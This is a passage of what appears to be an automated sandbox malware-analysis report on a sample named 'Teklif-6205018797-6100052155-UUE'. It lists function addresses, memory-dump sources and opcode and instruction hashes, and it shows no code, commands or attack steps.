                                                          • Opcode Fuzzy Hash: d05032759ab180161d75b0049201941832cb68bc9c6e5c270f585cd51f2842a9
                                                          • Instruction Fuzzy Hash: 2DF01474905259CFDB60CF18D884F9977B2BB05304F5095E5D10DA7250DB765EC98F05
                                                          Function 0596CE13 Relevance: .0, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3d6b008f0682886dc03c337b925ab3faf975db17a81aaf4b421af500794b6487
                                                          • Instruction ID: a36793c858cedabeed0c23294136f4228158a906742dd4924332caa8070935b9
                                                          • Opcode Fuzzy Hash: 3d6b008f0682886dc03c337b925ab3faf975db17a81aaf4b421af500794b6487
                                                          • Instruction Fuzzy Hash: B3E0E57090021C9FDB60DF94C950FEABBB9EB09300F0040E6A549AB640DA345E84CF60
                                                          Function 05967098 Relevance: .0, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0f1933aa714f97c9606ab32fbf495d07995387dcc3f27fe6e2398c86512bb3b9
                                                          • Instruction ID: 12dd0456ee94ce15666dece039083d4c830ab5400eb0681e833c306c7422ff2d
                                                          • Opcode Fuzzy Hash: 0f1933aa714f97c9606ab32fbf495d07995387dcc3f27fe6e2398c86512bb3b9
                                                          • Instruction Fuzzy Hash: 97E08C308081089FC744DBA8C8002ACBBF8EB45205F148099884853382D6329A45DBA1
                                                          Function 059682B0 Relevance: .0, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0f1933aa714f97c9606ab32fbf495d07995387dcc3f27fe6e2398c86512bb3b9
                                                          • Instruction ID: 9fa73b3b0cc7c45fcd06b0202afdd35e4ca6f69762b26d3aef5c5881cf8e73c7
                                                          • Opcode Fuzzy Hash: 0f1933aa714f97c9606ab32fbf495d07995387dcc3f27fe6e2398c86512bb3b9
                                                          • Instruction Fuzzy Hash: 2DE0C270808108DFC784DBE8C8042BCBFF8EB49301F1480D9CC0953381D6329E46DB41
                                                          Function 0585DB2D Relevance: .0, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cd82b503e3b4f264199e01a468f7dae4ac18c4a53a184b25eac1df0544443c9f
                                                          • Instruction ID: 3ccb399b5fa7b4a39913e12d886a1aa91e10153cdb48d55758f57123d2ce84dd
                                                          • Opcode Fuzzy Hash: cd82b503e3b4f264199e01a468f7dae4ac18c4a53a184b25eac1df0544443c9f
                                                          • Instruction Fuzzy Hash: EFF03930505208DFC700DF68E889B9CBBB1FB09318F1408AAE809AB242C7744D84CF06
                                                          Function 0585FEF8 Relevance: .0, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fb0b2903ba72b0329cf9b84a116e15b2cc3748859626b7518eaf6b33d9768904
                                                          • Instruction ID: b98963a6a2a0f488bd2c3f61a6c732fd7e4148ff2c614c5a401dedbda619d08b
                                                          • Opcode Fuzzy Hash: fb0b2903ba72b0329cf9b84a116e15b2cc3748859626b7518eaf6b33d9768904
                                                          • Instruction Fuzzy Hash: 6CE01230A01209EFDB44EFB4E941BAEB7FADF45204F1185A8E505AB244DA396F049B90
                                                          Function 0596ED98 Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3cb3e74b836eec3760ffc789b119160c5dd24c1572f87d78d3ab54de6a4995e
                                                          • Instruction ID: 38cf6e6258b7da044f0457770ee45f148f9c46094bf6ced5d99dd588dec89de0
                                                          • Opcode Fuzzy Hash: a3cb3e74b836eec3760ffc789b119160c5dd24c1572f87d78d3ab54de6a4995e
                                                          • Instruction Fuzzy Hash: 7DD05E78509108DBC744CB98D910AAAB7ADEB45314F1494999C0947391DA339E01DB81
                                                          Function 0079E2F8 Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 91121c377850c107ac44d85fed184c57a7f8fd9b6308fdffd1bb751ebef84ee1
                                                          • Instruction ID: 3b11a198e996ce264d3ed0d0e91480b438a83c7f8d91b2685f6952250332efb7
                                                          • Opcode Fuzzy Hash: 91121c377850c107ac44d85fed184c57a7f8fd9b6308fdffd1bb751ebef84ee1
                                                          • Instruction Fuzzy Hash: 83D0A77050D108EFCB04CB94E800A6DB7FDDB45315F14949C9C0943351CA339D01EF81
                                                          Function 05C76117 Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 79b76907bbd00d4282d48303dfcb28f0af57671dd4153c0329c34c8067b52a95
                                                          • Instruction ID: aa1198d0ecb65a45fa2b95f97eec7741f620fc4c6ccd61e1edb7873ec567f3ac
                                                          • Opcode Fuzzy Hash: 79b76907bbd00d4282d48303dfcb28f0af57671dd4153c0329c34c8067b52a95
                                                          • Instruction Fuzzy Hash: 60E0C974A00118CFC794EF18C8A8ADAB7F1FB48341F1085D4E449A7345CB345E84CF60
                                                          Function 0585FEB0 Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 92735704b11a0fbe8c7b7f685ac832abdaaa4637e4438efce7492c25bd1d4cb0
                                                          • Instruction ID: fcf2dfb3d8462f437889363c1e23555bdc7cb6b6492d22b2999029e777e54fe4
                                                          • Opcode Fuzzy Hash: 92735704b11a0fbe8c7b7f685ac832abdaaa4637e4438efce7492c25bd1d4cb0
                                                          • Instruction Fuzzy Hash: E6E01234A0511CEFCB40EFE9E900A5DB7FAEB45314F1041A9E408E7305DA356F059B91
                                                          Function 0596F140 Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cc250871d3aaf2e1be2668e494c2b80968461a3d3a39aa4119b020dbf4f82d1b
                                                          • Instruction ID: 957694ebdb0bc93f7c259a7dcd7dc8310ddd01cdf7deef7c79f331f75863804d
                                                          • Opcode Fuzzy Hash: cc250871d3aaf2e1be2668e494c2b80968461a3d3a39aa4119b020dbf4f82d1b
                                                          • Instruction Fuzzy Hash: A7D0A9B040E208DBCB28DBA8E9006A873AEAB42315F5014AC880812350CA329944EF41
                                                          Function 05C74024 Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 864ba1c654564b402bfa99ac8fcd34ff01121ea29447400f2d14af0802d5bdf7
                                                          • Instruction ID: 137587421b27823325d44cd2e367365a7e7e4f66a02e41f9cf0d082b759f380f
                                                          • Opcode Fuzzy Hash: 864ba1c654564b402bfa99ac8fcd34ff01121ea29447400f2d14af0802d5bdf7
                                                          • Instruction Fuzzy Hash: A3E0E534900218CFDB54CF28C858B85BBF2AB09320F1487D5D45D97261C7309E81CF00
                                                          Function 0585E198 Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: abb334217983f9e988f04901629a384cefbe192667ead130feb4245b2a1e4dad
                                                          • Instruction ID: 14b834f08869680c1a48df2bc3131dc97f368bd4c906290e784ac822cf8f49f6
                                                          • Opcode Fuzzy Hash: abb334217983f9e988f04901629a384cefbe192667ead130feb4245b2a1e4dad
                                                          • Instruction Fuzzy Hash: 3CE0E534A081288BC794EF24D85879EBBB2EB89355F104999A40EB7341CB745EC4CF54
                                                          Function 0585DDAD Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 57c8bf26625a93a64dcf4c705c4792b1c509570a012cd866ee1a09fc70745555
                                                          • Instruction ID: b5e18f2da3bc46e3bad98c6757a2e92806eb6e277fca88454f6bb19836279e55
                                                          • Opcode Fuzzy Hash: 57c8bf26625a93a64dcf4c705c4792b1c509570a012cd866ee1a09fc70745555
                                                          • Instruction Fuzzy Hash: 12E0E5749052288BC794EF18C85539DBAB6EB49300F100499E90EA3346CB301E84CF21
                                                          Function 0585D974 Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bc60070d348cb2d20ecf368312010dc74cb61de269ffea44e8a2fef6ad5e9749
                                                          • Instruction ID: 7808dec25e0b99ecd085780aea0386b813d61a47a3217a6eca8d1142a07599a2
                                                          • Opcode Fuzzy Hash: bc60070d348cb2d20ecf368312010dc74cb61de269ffea44e8a2fef6ad5e9749
                                                          • Instruction Fuzzy Hash: 59E075B4A00228CFD794EF54D855B9D7BB2EF8A311F5044A9A509A7344DA305E84CF66
                                                          Function 0585E0F9 Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6d66aea1220d3f18cb6952fbb8039af62a9b8d8ec08ee593ac64c444ce44468f
                                                          • Instruction ID: edddfa81ef11c1894bc4307c27bd733e26757c92504ffb95b540770d951b2bcb
                                                          • Opcode Fuzzy Hash: 6d66aea1220d3f18cb6952fbb8039af62a9b8d8ec08ee593ac64c444ce44468f
                                                          • Instruction Fuzzy Hash: 50E052B0900268CFD754EFA4D859B9D7BB2EB89311F105499A409AB394CB705E84CF74
                                                          Function 0585E013 Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 63c3027f8d09b9542a3cbe0e76259dee3dcbaae16808c008ecc247d890cc86ff
                                                          • Instruction ID: 924b3698f11d349b7dc67f6bda389ce5cd2925b799c51aa11e1390691883348a
                                                          • Opcode Fuzzy Hash: 63c3027f8d09b9542a3cbe0e76259dee3dcbaae16808c008ecc247d890cc86ff
                                                          • Instruction Fuzzy Hash: C7E09A749001288FDB94EF54D95579E7BB2EB49304F100499E50EB7355CB705E94DF24
                                                          Function 0585DBEC Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: feeef3adc07ccbd598c7b1982e9a50d423850dfc3585d93a6583ed276d708e9f
                                                          • Instruction ID: 833bc8f1d5d2a95cf6d46ac641ab5373f7a9ec8a46ae3b2b95b4db3ecf017bfb
                                                          • Opcode Fuzzy Hash: feeef3adc07ccbd598c7b1982e9a50d423850dfc3585d93a6583ed276d708e9f
                                                          • Instruction Fuzzy Hash: 8DE0E5749052288FD7D4EF14D894B997AB2EB4A324F204499E40DA7345CE305ED4CF28
                                                          Function 0585DE35 Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 85084e7c8d8a89eea8c7c54771e16bc077d168a49556ba4c9e54f42ab76d7004
                                                          • Instruction ID: 99b061e2fa88ce3acb7503bb68e32bb3e13c759502a4257cf1756572a326513e
                                                          • Opcode Fuzzy Hash: 85084e7c8d8a89eea8c7c54771e16bc077d168a49556ba4c9e54f42ab76d7004
                                                          • Instruction Fuzzy Hash: 93E01A349020288FD798EF14D965BE9BBB2FB4A300F1045D9A50EB7381CB301E44CF60
                                                          Function 05969EA8 Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cadfcb4b49e0a6c1d1df6323943d0fe8cfb0c9c16a3da379499b6bc2b0cb36c8
                                                          • Instruction ID: b25727310b4fcdd61309a37a10d284b21d8c50c55a12a58f7aefb4acf7079719
                                                          • Opcode Fuzzy Hash: cadfcb4b49e0a6c1d1df6323943d0fe8cfb0c9c16a3da379499b6bc2b0cb36c8
                                                          • Instruction Fuzzy Hash: 29D0A73008D701CBC726DF649888760BFACAB42706F043D55C45C074A2C7309564CB01
                                                          Function 0585DFC0 Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e62f6e2a58adbccf506018c657a2ff0c7acaa6c90eec127551fd13dae03fa2ad
                                                          • Instruction ID: 89b3377245170f66c8cde3c657fe8669c350e161602da7c4e95f011c38f7b1a3
                                                          • Opcode Fuzzy Hash: e62f6e2a58adbccf506018c657a2ff0c7acaa6c90eec127551fd13dae03fa2ad
                                                          • Instruction Fuzzy Hash: F9E04EB488012BCFDB64DF24DD49BA9BBB6AB08215F0055EA9819A3A51EB300AC4DF10
                                                          Function 058585F6 Relevance: .0, Instructions: 14COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e433c4497f16f4662b204f54e28b8733194c4512ec5b04d46b325f9f90766aff
                                                          • Instruction ID: 01c024c1296cd5022361b13bb96763cc6c25081cc12a4b6df059c3cf9df79dd5
                                                          • Opcode Fuzzy Hash: e433c4497f16f4662b204f54e28b8733194c4512ec5b04d46b325f9f90766aff
                                                          • Instruction Fuzzy Hash: B7E0EC30946118CFCB54DF54D948799BBBAFF05309F2095A58849AA255D7745E84CF01
                                                          Function 0593CC62 Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d1df9ae537cecca959c197672f31facd8168707409a94ab025744bb1343896c7
                                                          • Instruction ID: f21886d0d3d99943a937dcc0206886d656deffa11694dbc631da7b1766425cd7
                                                          • Opcode Fuzzy Hash: d1df9ae537cecca959c197672f31facd8168707409a94ab025744bb1343896c7
                                                          • Instruction Fuzzy Hash: A2D0C976280215AFC7059B54D845E8C7BA5EB48260F1AC160F618CBA72D72AEC129980
                                                          Function 0585817F Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7e5efbb6bd0fcc22d458012b3300a2e6cfda310f0b38adcbe6fa56d83bad64a5
                                                          • Instruction ID: 5528ee87b8dfbb42aa3ea13144f5a1c88a1f986099e4e3bbe14d403b776d8bbe
                                                          • Opcode Fuzzy Hash: 7e5efbb6bd0fcc22d458012b3300a2e6cfda310f0b38adcbe6fa56d83bad64a5
                                                          • Instruction Fuzzy Hash: 32D02E30A0221C8FCB48EF28DA5865E3BF2FF80301F0026A08842EB345EB301E42CF01
                                                          Function 0585A071 Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6a05f24865d2bccca8469df6f79b9f26886cf0dd7c3f818165a71733c14e1b02
                                                          • Instruction ID: 5528ee87b8dfbb42aa3ea13144f5a1c88a1f986099e4e3bbe14d403b776d8bbe
                                                          • Opcode Fuzzy Hash: 6a05f24865d2bccca8469df6f79b9f26886cf0dd7c3f818165a71733c14e1b02
                                                          • Instruction Fuzzy Hash: 32D02E30A0221C8FCB48EF28DA5865E3BF2FF80301F0026A08842EB345EB301E42CF01
                                                          Function 0585E072 Relevance: .0, Instructions: 13COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 446490c2a1ea3e58ae083d544367ca5ee2a9eddf466ac218c1ca3a75c167e1dc
                                                          • Instruction ID: ada64876174f0f5bb1594c0e1395174b3fb156477d75aeb2c4e364f868659e52
                                                          • Opcode Fuzzy Hash: 446490c2a1ea3e58ae083d544367ca5ee2a9eddf466ac218c1ca3a75c167e1dc
                                                          • Instruction Fuzzy Hash: DDE01231804518CBCB509F54CCD8EE8B732FB45329F5046F58C2D162D4C7355946DFA0
                                                          Function 0593EB7A Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 195744f09f45e58b48e0a68c4f5a7646956ab81eb1d7444a788f34a1ea81e7df
                                                          • Instruction ID: 2fcd8c17398140b30bbcd5f455c25bfdc66d73ca8775f2125dc7b9aa4c2c8a69
                                                          • Opcode Fuzzy Hash: 195744f09f45e58b48e0a68c4f5a7646956ab81eb1d7444a788f34a1ea81e7df
                                                          • Instruction Fuzzy Hash: 37D012761402049FC7059F55D841F457B79EB14660F4540A0F6058B762C225D811C944
                                                          Function 00790840 Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_790000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5954c78fd41b87836611061620173c907af1a0f46975a809341b1be8b5f6d842
                                                          • Instruction ID: 0923d089087979f5440a6be63efbf234e3a1a66f25d1b7c320c6fa1785cf0a8f
                                                          • Opcode Fuzzy Hash: 5954c78fd41b87836611061620173c907af1a0f46975a809341b1be8b5f6d842
                                                          • Instruction Fuzzy Hash: 32D0C9B15096519FC70ACB20EE929507FACB98320030625C2C000CF1B3EB289A008A64
                                                          Function 05C8D558 Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2232891361.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5c70000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a109d23e617925ea082cd55c8517ccae156e52274eac86ad293612863653212a
                                                          • Instruction ID: 59097f69f6f3b2264ac16ef8ba740d13e6db7a65d78e7f387bd901cf4035c691
                                                          • Opcode Fuzzy Hash: a109d23e617925ea082cd55c8517ccae156e52274eac86ad293612863653212a
                                                          • Instruction Fuzzy Hash: 0CC08CE008F20486C259B24A7C0837037DCA70232EF442C02B90E020A186B148A8DF16
                                                          Function 0585B78F Relevance: .0, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231078076.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5850000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fd0a42994048200d5afc6667cb47bb66dc5c70ad3e305c053dc44c78636b3079
                                                          • Instruction ID: c52519bcd25d72ccc870a3bb24157fc9e9c9f5feafd5e177d056c11bea2ca126
                                                          • Opcode Fuzzy Hash: fd0a42994048200d5afc6667cb47bb66dc5c70ad3e305c053dc44c78636b3079
                                                          • Instruction Fuzzy Hash: 0AD09EB0A455189FC755DF24DC1879ABB7AAB85306F1084DD944AA7240D7B05E448E11
                                                          Function 0596643F Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231818294.0000000005960000.00000040.00000800.00020000.00000000.sdmp, Offset: 05960000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5960000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 90d221d95c24b4a7d712cbc595726cf1432e44db2ea561941634c7278935c8af
                                                          • Instruction ID: 3224fa15256cb95a0131783828d68de72e220babbdb87a741e2c8ad376828c46
                                                          • Opcode Fuzzy Hash: 90d221d95c24b4a7d712cbc595726cf1432e44db2ea561941634c7278935c8af
                                                          • Instruction Fuzzy Hash: 37D05E748042288FC750AF20D85479DBFB2FB05300F40C4DA9489A7240DF344988DF10
                                                          Function 05931F70 Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2231654792.0000000005930000.00000040.00000800.00020000.00000000.sdmp, Offset: 05930000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5930000_Teklif-6205018797-6100052155-UUE.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7bdf9b72d59ad34968619677df93d7731988c334c1135bae0baee7a717ad273e
                                                          • Instruction ID: 192f883ab7c21d11d24f7bb1a931c0fd73d3f3ff48290fb66e2d5429ce333506
                                                          • Opcode Fuzzy Hash: 7bdf9b72d59ad34968619677df93d7731988c334c1135bae0baee7a717ad273e
                                                          • Instruction Fuzzy Hash: 29C08C30009610CFCB29EF28F544C867BEAFF403003018AADE01A8B224CB78EC42CF80
                                                          Function 0079A760 Relevance: .0, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2206273148.0000000000790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: false
                                                          Joe Sandbox IDA Plugin
